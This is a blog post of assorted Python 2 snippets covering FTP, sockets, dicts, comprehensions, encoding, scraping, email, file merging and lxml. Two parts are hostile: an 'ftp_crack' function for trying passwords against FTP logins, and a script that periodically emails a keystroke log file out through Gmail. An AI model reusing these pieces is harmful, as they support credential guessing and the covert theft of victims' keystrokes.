Some Python Snippets, Part 6


1. Python's ftplib module

An example first:

import ftplib

def ftp_anon(host):
    # Check whether the host accepts an anonymous FTP login.
    try:
        print '\n[+] Testing anonymous login...\n'
        ftp = ftplib.FTP()
        ftp.connect(host, 21, 10)
        ftp.login()
        ftp.retrlines('LIST')
        ftp.quit()
        print '\n[+] Anonymous login succeeded.'
    except ftplib.all_errors:
        print '\n[-] Anonymous login failed.'

def ftp_crack(host, user, pwd):
    try:
        ftp = ftplib.FTP()
        ftp.connect(host, 21, 10)
        ftp.login(user, pwd)
        ftp.retrlines('LIST')
        ftp.quit()
        print '\n[+] Login succeeded, user: ' + user + ' password: ' + pwd
    except ftplib.all_errors:
        pass

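ftp = ftplib.FTP()  # returns an instance of the FTP class

ftp.connect(host, 21, 10)  # connect to port 21 on host with a timeout of 10 seconds

ftp.retrlines('LIST')  # retrieve the directory/file listing in ASCII mode (printed to stdout by default)

Official documentation: 20.8. ftplib - FTP protocol client (Python 2.7.8 documentation)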

2. A brief introduction to Python's socket module

I. Getting the IP address(es) of a domain name with gethostbyname

host = socket.gethostbyname('ixyzero.com')
In [10]: socket.gethostbyname?
Type:        builtin_function_or_method
String form: <built-in function gethostbyname>
Docstring:
gethostbyname(host) -> address

Return the IP address (a string of the form '255.255.255.255') for a host.

In [11]: socket.gethostbyname_ex?
Type:        builtin_function_or_method
String form: <built-in function gethostbyname_ex>
Docstring:
gethostbyname_ex(host) -> (name, aliaslist, addresslist)

Return the true host name, a list of aliases, and a list of IP addresses,
for a host.  The host argument is a string giving a host name or IP number.

In [12]: baidu = socket.gethostbyname('www.baidu.com')

In [13]: type(baidu)
Out[13]: str

In [14]: print baidu
220.181.112.244

In [15]: baidu2 = socket.gethostbyname_ex('www.baidu.com')

In [16]: type(baidu2)
Out[16]: tuple


In [17]: print baidu2
('www.a.shifen.com', ['www.baidu.com'], ['220.181.112.244', '220.181.111.188'])

In [18]: for item in baidu2[2]: print item
220.181.112.244
220.181.111.188
# getaddrinfo returns one entry per resolved address; item[4] is the sockaddr tuple
import socket
result = socket.getaddrinfo('www.baidu.com', None, 0, socket.SOCK_STREAM)
for counter, item in enumerate(result, 1):
    print "%-2d: %s" % (counter, item[4])
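
The getaddrinfo call above can return the same address more than once. The following is a minimal sketch, written for Python 3 rather than the Python 2 used in this post, of collecting the distinct addresses in order. The helper name unique_addresses is hypothetical, and a numeric host is used so that no DNS lookup is needed.

```python
import socket

def unique_addresses(host):
    """Return the distinct IP addresses getaddrinfo reports for host, in order."""
    seen = []
    for family, socktype, proto, canonname, sockaddr in socket.getaddrinfo(
            host, None, 0, socket.SOCK_STREAM):
        ip = sockaddr[0]  # first element of the sockaddr tuple is the address
        if ip not in seen:
            seen.append(ip)
    return seen

print(unique_addresses('127.0.0.1'))
```

Passing a real host name instead of '127.0.0.1' works the same way, but the result then depends on the resolver.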

 

3. Deduplicating/counting and sorting with Python dicts
def get_counts(sequence):
    counts = {}
    for x in sequence:
        if x in counts:
            counts[x] += 1
        else:
            counts[x] = 1
    return counts
####
from collections import defaultdict
def get_counts2(sequence):
    counts = defaultdict(int)
    for x in sequence:
        counts[x] += 1
    return counts
####
dict_str = {'blue':'[email protected]', 'allen':'[email protected]', 'sophia':'[email protected]', 'ceen':'[email protected]'}
print dict_str
# sort by key
print sorted(dict_str.items(), key=lambda d:d[0])
# sort by value
print sorted(dict_str.items(), key=lambda d:d[1])

for key, value in dict_str.items():
	print key, value
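
Both counting functions above can also be replaced by collections.Counter from the standard library. The sketch below is written for Python 3, and the sample list words is made up for illustration.

```python
from collections import Counter

words = ['a', 'b', 'a', 'c', 'b', 'a']  # hypothetical sample data
counts = Counter(words)

# The two most frequent items with their counts.
top = counts.most_common(2)

# Sorting the (key, count) pairs by key and by count, as in the text above.
by_key = sorted(counts.items())
by_count_desc = sorted(counts.items(), key=lambda kv: kv[1], reverse=True)

print(top)
print(by_key)
print(by_count_desc)
```

Counter is a dict subclass, so the sorted(...items(), key=...) idiom shown earlier applies to it unchanged.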

 

4. Functions are objects too in Python
#### Functions are objects too ####
states = ['  Alabama ', 'Georgia!', 'Georgia', 'georgia', 'south    carolina##', ' West virginia?', 'New York .', 'China.', 'Beijing...']

import re
def clean_strings(strings):
    result = []
    for value in strings:
        value = value.strip()
        value = re.sub('[!#?]', '', value)
        value = value.title()
        result.append(value)
    return result
clean_strings(states)

def remove_punctuation(value):
    return re.sub('[!?#]', '', value)
clean_ops = [str.strip, remove_punctuation, str.title]
def clean_strings2(strings, ops):
    result = []
    for value in strings:
        for function in ops:
            value = function(value)
        result.append(value)
    return result
clean_strings2(states, clean_ops)

map(remove_punctuation, states) # the built-in map function is pretty awesome!
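
Because functions are ordinary objects, a list of them can also be folded into a single callable. The sketch below is written for Python 3; the helper name pipeline is hypothetical, and functools.reduce is swapped in for the explicit inner loop used above. In Python 3, map returns an iterator, so wrap it in list() to see the values.

```python
import re
from functools import reduce

def remove_punctuation(value):
    return re.sub('[!?#]', '', value)

def pipeline(*funcs):
    """Build one function that applies funcs to a value from left to right."""
    return lambda value: reduce(lambda acc, f: f(acc), funcs, value)

clean = pipeline(str.strip, remove_punctuation, str.title)
cleaned = [clean(s) for s in ['  Alabama ', 'Georgia!', ' West virginia?']]
print(cleaned)

# map is lazy in Python 3, hence the list() call.
print(list(map(remove_punctuation, ['Georgia!', 'a#b'])))
```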

 

5. Comprehensions in Python (awesome!)
# list comprehensions
strings = ['a', 'as', 'a', 'bad', 'boy', 'Python']
[x.upper() for x in strings]
[x.upper() for x in strings if len(x)>2]

# dict comprehensions
dict_map = {key:value for key, value in enumerate(strings)}
dict_map = dict((value, key) for key, value in enumerate(strings))
def file_2_dict(fileName):
    return {k.strip():v.strip() for k, v in (l.split('=') for l in open(fileName))}

# set comprehensions
set_map = {key for key in strings}

# nested list comprehensions
all_data = [['Tom', 'Jerry', 'Lily', 'Lucy', 'Hello,world', 'Jefferson', 'Steven', 'Joe', 'Bill'], ['Susie', 'Cookie', 'Qunar', 'Baidu', 'Notepad', 'Apple', 'Alibaba']]
names_of_interest = []
for names in all_data:
    enough = [name for name in names if name.count('e')>2]
    names_of_interest.extend(enough)

names2 = [name for names in all_data for name in names if name.count('e') > 2]
names3 = [name for names in all_data for name in names]
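
In a nested comprehension the for clauses read in the same order as the equivalent nested loops. The sketch below is written for Python 3 and uses a shortened, made-up subset of the names. No name in the sample data above contains more than two "e" characters, so the filter with > 2 selects nothing there; the sketch uses >= 2 purely so that the filter has a visible effect.

```python
all_data = [['Tom', 'Jefferson', 'Steven'], ['Susie', 'Apple']]  # shortened sample

# Flattening with a nested comprehension ...
flat = [name for names in all_data for name in names]

# ... is equivalent to these nested loops.
flat_loop = []
for names in all_data:
    for name in names:
        flat_loop.append(name)

# Filter inside the comprehension (threshold chosen for illustration).
with_two_e = [name for name in flat if name.count('e') >= 2]

# Dict comprehension mapping each name to its length.
lengths = {name: len(name) for name in flat}

print(flat, with_two_e, lengths)
```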

 

6. Python's encode and decode methods

First, a wrapper function for Windows that avoids garbled output:

import sys
def encode(s):
    return s.decode('utf-8').encode(sys.stdout.encoding, 'ignore')

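This function first decodes the given byte string s as UTF-8 and then re-encodes it with the terminal's default encoding (sys.stdout.encoding). Characters the terminal cannot represent are dropped because of 'ignore'. It displays well in a Windows console.

Python's built-in encode() method encodes a string with the codec named by encoding. The errors parameter selects the error-handling scheme.
Syntax: str.encode(encoding='UTF-8', errors='strict') (this is the Python 3 signature; in Python 2, encoding defaults to the interpreter's default encoding, as the docstring further down shows)
encoding: the encoding to use, e.g. "UTF-8".
errors: the error-handling scheme. The default is 'strict', meaning that an encoding error raises a UnicodeError. Other possible values are 'ignore', 'replace', 'xmlcharrefreplace', 'backslashreplace', and any name registered through codecs.register_error().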
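
The effect of each errors value is easiest to see by encoding non-ASCII text with the ASCII codec. The sketch below is written for Python 3, where str is already a text type; the variable names are made up for illustration.

```python
text = '\u4e2d\u56fd'  # the two Chinese characters used in the session further down

results = {
    'ignore': text.encode('ascii', 'ignore'),
    'replace': text.encode('ascii', 'replace'),
    'xmlcharrefreplace': text.encode('ascii', 'xmlcharrefreplace'),
    'backslashreplace': text.encode('ascii', 'backslashreplace'),
}
for name, encoded in results.items():
    print(name, encoded)

# With the default errors='strict' the same call raises instead.
try:
    text.encode('ascii')
    strict_error = None
except UnicodeEncodeError as exc:
    strict_error = exc
print(type(strict_error).__name__)
```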

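Python scripts that deal with character encodings often add the following near the top:

import sys
reload(sys)
sys.setdefaultencoding('utf8')

In Python 2.5 and later, sys.setdefaultencoding is deleted once the interpreter has finished initializing, so sys has to be reloaded with reload(sys) before the default encoding can be set by hand. Note that the comment at the end of this post links to arguments against doing this.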

In [26]: import sys

In [27]: print sys.stdout.encoding
cp936

In [28]: a = 'string...'

In [29]: a.encode?
Type:        builtin_function_or_method
String form: <built-in method encode of str object at 0x033E41C0>
Docstring:
S.encode([encoding[,errors]]) -> object

Encodes S using the codec registered for encoding. encoding defaults
to the default encoding. errors may be given to set a different error
handling scheme. Default is 'strict' meaning that encoding errors raise
a UnicodeEncodeError. Other possible values are 'ignore', 'replace' and
'xmlcharrefreplace' as well as any other name registered with
codecs.register_error that is able to handle UnicodeEncodeErrors.
By default, encode uses the system default encoding for s; with the default 'strict' handler this can raise a UnicodeEncodeError.

In [30]: s = '中国'

In [31]: print s
涓浗

In [32]: type(s)
Out[32]: str

In [33]: repr(s)
Out[33]: "'\xe4\xb8\xad\xe5\x9b\xbd'"

In [34]: s.en
s.encode   s.endswith

In [34]: s.encode('gb2312')
---------------------------------------------------------------------------
UnicodeDecodeError                        Traceback (most recent call last)
<ipython-input-34-d73c576b1830> in <module>()
----> 1 s.encode('gb2312')

UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 0: ordinal not in range(128)
'''
The exception is raised because Python first implicitly decodes s to unicode and then encodes the result as gb2312. Since the decoding step is implicit and no codec was given, Python uses the one reported by sys.getdefaultencoding(). In most cases that is ASCII, so the call fails whenever s contains non-ASCII bytes.
'''

In [35]: s.decode('utf-8').encode('gb2312')
Out[35]: '\xd6\xd0\xb9\xfa'

In [36]: sys.stdout.encoding
Out[36]: 'cp936'

In [37]: s.decode('utf-8')
Out[37]: u'\u4e2d\u56fd'

In [38]: s.decode('utf-8').encode('utf-8')
Out[38]: '\xe4\xb8\xad\xe5\x9b\xbd'

In [39]: s.decode?
Type:        builtin_function_or_method
String form: <built-in method decode of str object at 0x034F39C0>
Docstring:
S.decode([encoding[,errors]]) -> object

Decodes S using the codec registered for encoding. encoding defaults
to the default encoding. errors may be given to set a different error
handling scheme. Default is 'strict' meaning that encoding errors raise
a UnicodeDecodeError. Other possible values are 'ignore' and 'replace'
as well as any other name registered with codecs.register_error that is
able to handle UnicodeDecodeErrors.
When no codec is given, Python decodes with the one reported by sys.getdefaultencoding(). In most cases that is ASCII, so decoding fails whenever s contains non-ASCII bytes.
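
For comparison, here is the same round trip as a minimal Python 3 sketch. Python 3 separates bytes from str, and bytes has no encode method, so the implicit ASCII decode that caused the traceback above cannot happen silently; every conversion has to be spelled out. The variable names are made up for illustration.

```python
utf8_bytes = b'\xe4\xb8\xad\xe5\x9b\xbd'  # the bytes shown by repr(s) in the session

text = utf8_bytes.decode('utf-8')       # bytes -> text, explicit codec
gb_bytes = text.encode('gb2312')        # text -> bytes in another encoding
round_trip = text.encode('utf-8')       # back to the original bytes

# Decoding the same bytes as ASCII fails, which is what Python 2 attempted implicitly.
try:
    utf8_bytes.decode('ascii')
    ascii_error = None
except UnicodeDecodeError as exc:
    ascii_error = exc

print(repr(text), gb_bytes, round_trip)
```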
7. An improved string split function
def tsplit(string, delimiters):
    """Behaves like str.split but supports multiple delimiters."""
    delimiters = tuple(delimiters)
    stack = [string,]
    for delimiter in delimiters:
        for i, substring in enumerate(stack):
            substack = substring.split(delimiter)
            stack.pop(i)
            for j, _substring in enumerate(substack):
                stack.insert(i+j, _substring)

    return stack
####
s = 'thing1,thing2/thing3-thing4'
print tsplit(s, (',', '/', '-'))	# ['thing1', 'thing2', 'thing3', 'thing4']
print tsplit('你好,Python,yoyo-checknow. Justdoit!', (',', ',', '.'))	# ['\xe4\xbd\xa0\xe5\xa5\xbd', 'Python', 'yoyo-checknow', ' Justdoit!']
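
An alternative to the stack-based tsplit is a single regular expression. This is a sketch written for Python 3, not the original author's approach; the name tsplit_re is hypothetical, and it assumes at least one non-empty delimiter is passed. re.escape keeps characters such as "." from being treated as regex metacharacters.

```python
import re

def tsplit_re(string, delimiters):
    """Split string on any of the given delimiters using one regex alternation."""
    pattern = '|'.join(re.escape(d) for d in delimiters)
    return re.split(pattern, string)

s = 'thing1,thing2/thing3-thing4'
print(tsplit_re(s, (',', '/', '-')))
print(tsplit_re('a.b.c', ('.',)))
```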
8. Downloading code from OSChina with Python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re, urllib, sys, time

def main():
    # pose as a browser
    headers = ('User-Agent','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)')
    opener = urllib.URLopener()
    opener.addheaders = [headers]
    # loop over the list pages
    for page in range(1,29):
        url = "http://www.oschina.net/code/list/7/python?show=time&p=" + str(page)
        data = opener.open(url).read()
        data = data.decode('UTF8')
        # extract the post URLs
        url_list = re.findall(r'<a href="(.*)" target="_blank" title=', data)
        # extract the post titles
        post_list = re.findall(r'"_blank" title="(.*)">', data)
        for i in range(len(url_list)):
            reload(sys)
            sys.setdefaultencoding('utf-8')
            post_data = opener.open(url_list[i]).read()
            post_data = post_data.decode('UTF8')
            # Being new to re, I asked an expert, who suggested a simple approach:
            # replace newlines with AaA so "." matches across the whole page, then extract the post
            x = post_data.replace('\n', 'AaA')
            post = re.match(r'.*<pre class="brush: python; auto-links: false; ">(.*)</pre', x)
            print(post_list[i])
            # This failed at first because some post pages contain no code at all
            # (post is then None), hence the try.
            try:
                # name the file after the post title
                post_name = re.sub('[/:.* ]', '_', post_list[i])
                f = open(r'oschina/%s.py' % post_name, 'w')
                post = post.group(1).replace('AaA', '\n')
                f.write(post)
                f.close()
            except AttributeError:
                print(post_list[i] + ":null")
            time.sleep(1)
    print("That's all!")
if __name__ == '__main__':
    main()

Original post: python 下载oschina python代码 (Downloading OSChina's Python code with Python)
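
The AaA placeholder trick in the script works around the fact that "." does not match a newline by default. A possible alternative, sketched here for Python 3, is the re.DOTALL flag, which lets "." match newlines directly. The function name extract_code and the sample HTML are made up for illustration, and the sketch uses a non-greedy group and re.search, which differs slightly from the greedy re.match in the script.

```python
import re

# Same <pre> marker as in the script; DOTALL lets "." span line breaks.
PRE_BLOCK = re.compile(
    r'<pre class="brush: python; auto-links: false; ">(.*?)</pre',
    re.DOTALL)

def extract_code(html):
    """Return the text of the first matching <pre> block, or None if there is none."""
    match = PRE_BLOCK.search(html)
    return match.group(1) if match else None

sample = ('<div>\n<pre class="brush: python; auto-links: false; ">'
          'print(1)\nprint(2)</pre>\n</div>')
print(extract_code(sample))
print(extract_code('<p>no code here</p>'))
```

Returning None for pages without code also removes the need to catch AttributeError.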

9. Sending email with Python
#!/usr/bin/env python
#-*- coding: utf8 -*-
'''
A command-line program for sending email (attachments supported)
'''
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import sys

def helpinfo():
    print '''
    Usage: pymail -u user@domain -p passwd -h smtp server host -t to who [-a attachment file path] [-n attachment name] [-s subject]
    Usage: email content use . to end
    -h  specify smtp server host
    -u  which user you login the smtp server, and must with it domain
    -p  the password of the smtp user
    -t  The email recipient, multiple addresses can use ',' split
    -a  Add attachment
    -n  Specify attachment name in the email
    -s  Specify the email subject
    '''

options = ['-t', '-a', '-n', '-h', '-u', '-p', '-s']    # all recognized options
argvnum = len(sys.argv) # number of command-line arguments
# check the arguments: every odd position must hold a known option
for i in range(argvnum):
    if ( i % 2 != 0):
        if (sys.argv[i] not in options):
            print 'Unknown option ', sys.argv[i] , ', Please use -h see help!'
            sys.exit(3)
# show the help text when there are no arguments or the first one is -h
if len(sys.argv) == 1 or sys.argv[1] == '-h':
    helpinfo()
# -n is only valid together with -a
if ('-n' in sys.argv) and ('-a' not in sys.argv):
    print 'Error:option "-n" must use after -a'
    sys.exit(2)
# read the value of each option below
try:
    tmpmailto = sys.argv[sys.argv.index('-t')  + 1]
    if ',' in tmpmailto:
        mailto = tmpmailto.split(',')
    else:
        mailto = [tmpmailto,]
except ValueError:
    print 'Error: need Mail Recipient'
    sys.exit(1)
haveattr=True
try:
    attrpath = sys.argv[sys.argv.index('-a') + 1]
    try:
        attrname = sys.argv[sys.argv.index('-n') +1 ]
    except ValueError:
        attrname = attrpath.split('/')[-1]
except:
    attrname = None
    haveattr = False
    attrpath = None
try:
    mail_host = sys.argv[sys.argv.index('-h') +1]
except ValueError:
    print 'Warning: no SMTP server specified, using 127.0.0.1'
    mail_host = '127.0.0.1'
try:
    mail_useremail = sys.argv[sys.argv.index('-u') +1]
except ValueError:
    print 'Warning: no user specified, using root'
    mail_useremail = 'root@localhost'
try:
    mail_sub = sys.argv[sys.argv.index('-s') + 1]
except:
    mail_sub = 'No Subject'
mail_user = mail_useremail.split('@')[0]
mail_postfix = mail_useremail.split('@')[1]
try:
    mail_pass = sys.argv[sys.argv.index('-p') +1]
except ValueError:
    mail_pass = ''
# the mail-sending function
def send_mail(to_list, sub, content, haveattr, attrpath, attrname):
    me = mail_user + "<" + mail_user+"@"+mail_postfix +">"
    # check whether there is an attachment
    if (haveattr):
        if (not attrpath):
            print 'Error : no input file of attachments'
            return False
        # with an attachment, create a multipart message
        msg = MIMEMultipart()
        # build the attachment part
        att = MIMEText(open(attrpath, 'rb').read(),'base64', 'utf8')
        att["Content-Type"] = 'application/octet-stream'
        att["Content-Disposition"] = 'attachment;filename="'+ attrname +'"'
        msg.attach(att)
        msg.attach(MIMEText(content))
    else:
        # otherwise create a plain-text message
        msg = MIMEText(content)
    # mail headers
    msg['Subject'] = sub
    msg['From'] = me
    msg['To'] = ", ".join(to_list)
    try:
        # send the mail
        s = smtplib.SMTP()
        s.connect(mail_host)
        if (mail_host != '127.0.0.1'):
            s.login(mail_user, mail_pass)
        s.sendmail(me, to_list, msg.as_string())
        s.close()
        return True
    except Exception, e:
        print str(e)
        return False

if __name__ == '__main__':
    try:
        content = ''
        while True:
            c = raw_input('')
            if c == '.':
                break
            content += c + '\n'
    except EOFError:
        for line in sys.stdin:
            content += line
    if send_mail(mailto, mail_sub, content, haveattr, attrpath, attrname):
        print "Success"
    else:
        print "Failed"
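
For readers on Python 3, the message-building part of send_mail can be sketched with email.message.EmailMessage from the standard library. This is an illustration only, not a port of the script above: the function name build_message, the addresses, and the attachment bytes are all made up, and nothing is sent.

```python
from email.message import EmailMessage

def build_message(sender, recipients, subject, body,
                  attachment=None, filename=None):
    """Build a message; attachment is raw bytes sent as application/octet-stream."""
    msg = EmailMessage()
    msg['Subject'] = subject
    msg['From'] = sender
    msg['To'] = ', '.join(recipients)  # address lists are comma-separated
    msg.set_content(body)
    if attachment is not None:
        msg.add_attachment(attachment, maintype='application',
                           subtype='octet-stream', filename=filename)
    return msg

msg = build_message('root@localhost', ['a@example.com', 'b@example.com'],
                    'No Subject', 'hello\n',
                    attachment=b'\x00\x01', filename='data.bin')
attachments = list(msg.iter_attachments())
print(msg['Subject'], len(attachments), attachments[0].get_filename())
```

A message built this way could then be handed to smtplib.SMTP.send_message, which takes the sender and recipients from the headers.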
#!/usr/bin/env python
#coding=utf-8

import smtplib
from email.Message import Message
import time
import optparse
import sched

schedular=sched.scheduler(time.time, time.sleep)

def sendMail(emailTo, thePasswd):
    systemTime=time.strftime('%Y-%m-%d-%T',time.localtime(time.time()))
    try:
        fileObj=open("/root/.secret-keys.log", "r")    # "/root/.secret-keys.log" is the keystroke log's output file; change it to match your own output file
        content=fileObj.read()
    except:
        print "Cannot read file\n"
        exit()

    message = Message()
    message['Subject'] = 'Log Keys'    # mail subject
    message['From'] = "[email protected]"
    message['To'] = emailTo
    message.set_payload("Current time: "+systemTime+"\n"+content)    # mail body
    msg = message.as_string()

    smtp = smtplib.SMTP("smtp.gmail.com", port=587, timeout=20)
    #smtp.set_debuglevel(1)		# enable debug mode
    smtp.starttls()				# switch to a TLS-secured connection
    smtp.login(emailTo, thePasswd)
    smtp.sendmail("[email protected]", emailTo, msg)
    time.sleep(5)	# wait so that quit() is not called before the mail has been sent
    smtp.quit()

def perform(inc, emailTo, thePasswd):
    schedular.enter(inc, 0, perform, (inc, emailTo, thePasswd))
    sendMail(emailTo, thePasswd)

def myMain(inc, emailTo, thePasswd):
    schedular.enter(0, 0, perform, (inc, emailTo, thePasswd))
    schedular.run()

if __name__=="__main__":
    optObj=optparse.OptionParser()
    optObj.add_option("-u", dest="user", help="Gmail account")
    optObj.add_option("-p", dest="passwd", help="Gmail Passwd")
    (options, args)=optObj.parse_args()

    emailName=options.user
    emailPasswd=options.passwd
    myMain(15, emailName, emailPasswd)	# 15 is the interval in seconds between mails; adjust it as needed
10. Merging files
#!/usr/bin/env python
# coding=utf-8
import sys, os, msvcrt

def join(in_filenames, out_filename):
    out_file = open(out_filename, 'w+')
    err_files = []
    for file in in_filenames:
        try:
            in_file = open(file, 'r')
            out_file.write(in_file.read())
            out_file.write('\n\n')
            in_file.close()
        except IOError:
            print 'error joining: ', file
            err_files.append(file)
    out_file.close()
    print 'join completed. %d file(s) missed.' % len(err_files)
    print 'output file: ', out_filename
    if len(err_files) > 0:
        print 'missed files:'
        print '--------------------------------'
        for file in err_files:
            print file
        print '--------------------------------'

if __name__ == '__main__':
    print 'scanning...'
    in_filenames = []
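    src_dir = sys.argv[1]
    for file in os.listdir(src_dir):
        # os.listdir returns bare names, so join them with the directory
        path = os.path.join(src_dir, file)
        if file.lower().endswith('[all].txt'):
            os.remove(path)
        elif file.lower().endswith('.txt'):
            in_filenames.append(path)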
    if len(in_filenames) > 0:
        print '----------------------------------------'
        print '%d part(s) in total.' % len(in_filenames)
        print '----------------------------------------'
        book_name = raw_input('Enter the book name: ')
        print 'joining...'
        join(in_filenames, book_name + '[ALL].txt')
    else:
        print 'nothing found.'
    msvcrt.getch()
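
The core of the merge can be sketched in Python 3 with context managers, so that files are closed even when an error occurs. The function name join_text_files is hypothetical, and the demonstration runs in a temporary directory with made-up file contents. Unlike the script above, it is not tied to Windows (no msvcrt) and does no interactive prompting.

```python
import os
import tempfile

def join_text_files(src_dir, out_path, suffix='.txt'):
    """Concatenate files in src_dir ending with suffix into out_path.

    Returns the merged file names in the (sorted) order they were written.
    """
    names = sorted(n for n in os.listdir(src_dir) if n.lower().endswith(suffix))
    with open(out_path, 'w', encoding='utf-8') as out_file:
        for name in names:
            with open(os.path.join(src_dir, name), encoding='utf-8') as in_file:
                out_file.write(in_file.read())
                out_file.write('\n\n')  # blank line between parts, as above
    return names

with tempfile.TemporaryDirectory() as tmp:
    for name, text in [('b.txt', 'second'), ('a.txt', 'first')]:
        with open(os.path.join(tmp, name), 'w', encoding='utf-8') as f:
            f.write(text)
    out_path = os.path.join(tmp, 'book.out')
    merged = join_text_files(tmp, out_path)
    with open(out_path, encoding='utf-8') as f:
        result = f.read()

print(merged)
```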
11. How a Python script can get its own file name

There are two ways: __file__ and sys.argv[0]

# coding=utf-8
import sys
print __file__
print sys.argv[0]
text = open(__file__).read()
print text[:-1]
12. A few uses of the lxml module
from lxml.html import parse
from urllib2 import urlopen
parsed = parse(urlopen('http://finance.yahoo.com/q/op?s=AAPL+Options'))
doc = parsed.getroot()

links = doc.findall('.//a')
links[15:20]
lnk = links[2]
lnk.get('href')
lnk.text_content()

urls = [lnk.get('href') for lnk in doc.findall('.//a')]
tables = doc.findall('.//table')
rows = doc.findall('.//tr')
####

zparsed = parse(urlopen('http://ixyzero.com/blog/sitemap.html'))
zdoc = zparsed.getroot()
zurls = [lnk.get('href') for lnk in zdoc.findall('.//a')]
zlinks = zdoc.findall('.//a')
####

parseD = parse(urlopen('http://finance.yahoo.com/q/op?s=AAPL+Options'))
doc = parseD.getroot()
def _unpack(doc, kind='a'):
	elts = doc.findall('.//%s' % kind)
	return [val.get('href') for val in elts]
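
When lxml is not installed, the href collection above can be approximated with the standard library. The sketch below is written for Python 3 and swaps in html.parser.HTMLParser for lxml; the class and function names and the sample HTML are made up. Unlike _unpack, it skips anchors that have no href instead of returning None for them.

```python
from html.parser import HTMLParser

class LinkCollector(HTMLParser):
    """Collect the href attribute of every <a> tag fed to the parser."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            href = dict(attrs).get('href')
            if href is not None:
                self.hrefs.append(href)

def extract_links(html):
    collector = LinkCollector()
    collector.feed(html)
    return collector.hrefs

sample = ('<ul><li><a href="/a">A</a></li>'
          '<li><a href="http://example.com/b">B</a></li>'
          '<li><a>no href</a></li></ul>')
print(extract_links(sample))
```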
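13. Friend-link (blogroll) statistics
#!/usr/bin/env python
# coding=utf-8
# Imports the snippet relies on. Assumption: Python 2 with BeautifulSoup 3,
# whose API provides findAll and recursiveChildGenerator.
from urlparse import urlparse
from BeautifulSoup import NavigableString, Tag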
def affect(points, keep_ratio, ratio, power):
    keep = points * keep_ratio
    if ratio >= 1.: return points
    return keep + (points - keep) * pow(ratio, power)

def calc_link_points(host, ul):
    # simplified host: drop the subdomain part
    parts = host.split('.')
    if parts[-2] in ('com','edu','net','gov','org'):
        host = '.'.join(host.split('.')[-3:])
    else:
        host = '.'.join(host.split('.')[-2:])

    link_density = linktext_count = totaltext_count = 0.001
    container_count = innerlink_count = 0.001
    for a in ul.findAll('a'):
        href = a.get('href', '')
        # internal link
        if not href or not href.lower().startswith('http') or host in href:
            innerlink_count += 1
            continue
        # path is too deep
        if urlparse(href)[2].strip('/').count('/') >= 1 or '?' in href:
            continue
        link_density += 1
        linktext_count += len(a.text)
        if '_blank' == a.get('target'):
            link_density += 1
    # count the characters of text in the container
    for t in ul.recursiveChildGenerator():
        if type(t) is NavigableString:
            totaltext_count += len(t)
        else:
            container_count += 1
    points = (link_density - innerlink_count) * 1000
    if points < 0: return 0

    points = affect(points, 0.1, linktext_count / totaltext_count, 2.)
    points = affect(points, 0.1, link_density / container_count, 1.)

    if points < 1000: points = 0
    return points
####
def find_text(body):
    candidates = []
    total_links = len(body.findAll('a')) + 0.001
    # enumerate the text containers
    for tag in ('div', 'section', 'article', 'td', 'li', 'dd', 'dt'):
        for x in body.findAll(tag):
            if type(x) is not Tag: continue
            points = len(x.text[:100].encode('utf8')) * 1000
            points = affect(points, 0.1, 1 - len(x.findAll('a')) * 1. / total_links, 1.)
            candidates.append((points, x))
    # sort and take the container with the highest score
    candidates.sort(reverse = True)
    if candidates:
        return candidates[0][1]
    return body

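The snippets are taken from: 通过友情链接进行博客Feed的搜集,你的博客收录了吗 ("Collecting blog feeds through friend links: has your blog been included?"). I am still working on understanding and learning from them.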
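
To make the scoring easier to follow, here is the affect helper from the snippet evaluated on a few made-up inputs, as a Python 3 sketch. A fraction keep_ratio of the points is always kept, and the remainder is scaled by ratio raised to power; a ratio of 1 or more leaves the points untouched.

```python
def affect(points, keep_ratio, ratio, power):
    # Same logic as in the snippet above.
    keep = points * keep_ratio
    if ratio >= 1.0:
        return points
    return keep + (points - keep) * pow(ratio, power)

half = affect(1000, 0.1, 0.5, 2.0)   # 100 kept + 900 * 0.5**2
full = affect(1000, 0.1, 1.0, 2.0)   # ratio >= 1: unchanged
floor = affect(1000, 0.1, 0.0, 2.0)  # ratio 0: only the kept part remains

print(half, full, floor)
```

With keep_ratio 0.1, as used in both functions above, a score can therefore never drop below a tenth of its starting value.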

14. Fetching a small number of search results with the Google API
#!/usr/bin/env python

import urllib
import simplejson
query = urllib.urlencode({'q':'ixyzero.com'})
url = 'http://ajax.googleapis.com/ajax/services/search/web?v=1.0&%s'%(query)
search_results = urllib.urlopen(url)
json = simplejson.loads(search_results.read())
print(json)
results = json['responseData']['results']
print len(results)
for i in results:
    print i['title'] + ": " + i['url']

 

To be continued...

2 comments on "Some Python Snippets, Part 6"

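  1. Stop using setdefaultencoding('utf-8') right now, and why
    https://blog.ernest.me/post/python-setdefaultencoding-unicode-bytes
    `
    Worst practice

    Two major problems caused by sys.setdefaultencoding('utf-8')
    In short, doing this makes some code behave strangely, and the strangeness is hard to fix because it lingers as an invisible bug. Two examples follow.
    1. Encoding errors
    2. Abnormal dictionary behavior

    The root of the problem: strings in Python 2
    To keep its syntax concise and convenient, Python does many tricky things, and conflating byte strings with text strings is one of them.
    Python has three string-related types: unicode (text string), str (byte string, binary data), and basestring, the parent class of the first two.

    Best practice
    · All text strings should be of type unicode, not str. If you are handling text and the type is str, you are creating a bug.
    · When a conversion is needed, convert explicitly. Decode bytes to text with var.decode(encoding); encode text to bytes with var.encode(encoding).
    · When reading data from outside, assume it is bytes and decode it into the text you need; likewise, when sending text out, encode it to bytes first.
    `

    Why should we NOT use sys.setdefaultencoding("utf-8") in a py script?
    https://stackoverflow.com/questions/3828723/why-should-we-not-use-sys-setdefaultencodingutf-8-in-a-py-script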
